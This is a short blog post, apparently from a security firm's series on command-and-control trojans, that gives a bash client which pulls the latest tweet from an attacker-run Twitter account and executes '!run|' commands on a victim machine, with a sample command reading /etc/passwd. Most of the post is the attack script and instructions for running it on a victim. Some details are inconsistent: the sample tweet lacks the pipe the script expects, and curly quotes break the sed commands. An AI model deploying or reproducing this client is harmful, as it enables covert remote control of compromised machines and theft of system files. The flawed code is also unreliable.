This is the third post in a series covering various command and control (C2) trojan concepts and strategies

In the last few posts I covered a few C2 Trojans (DNS C2 Trojan, HTTP GET and POST Trojan). In this post I wanted to cover a method that uses Twitter for command and control.



Quick Twitter Command and Control Trojan Setup

To do this, we need to set up an account that we will use to post commands on Twitter. For this example, we will say C_AND_C_USER. Now, we can post a few tweets containing the following message:

!run cat /etc/passwd > /tmp/test.txt


Now we can use the following code to run the command from the latest tweet on the victim machine:

#!/bin/bash
IFS_BAK=$IFS
IFS="
"
for i in `curl https://api.twitter.com/1/statuses/user_timeline.rss?screen_name=C_AND_C_USER 2>/dev/null|grep title|grep -v Twitter|head -n 1|sed -e ‘s/<title>//’ -e ‘s/<\/title>//’ -e "s/C_AND_C_USER://" -e "s/^ //g" -e "s/^  //g"`
  do  
  if [ `echo $i |grep "^!sleep|"` ] ; then
    echo "..."
  elif [ `echo $i |grep "^!run|"` ] ; then
    run=`echo "$i"|sed -s ‘s/^!run|//’`
    bash "$run"
  else
    echo "..."
  fi
done


The only thing we need to do is replace C_AND_C_USER with the real Twitter handle. You can do this using sed:

sed -i ‘s/C_AND_C_USER/fakename/g’ twitter_client.sh


Run Client

Finally, we run twitter_client on the victim to execute the command on the victim machine.

bash ./twitter_client.sh


The client will run the last posted Twitter command if it starts with ’!run|’. If you post a tweet that starts with something else or starts with ’!sleep|’ the client will not run any command.

Regards,

Jabra





Your World, Secured.


Tech Puzzles

Try our Puzzles

Test your problem solving skills. Do you have what it takes?

Try puzzles »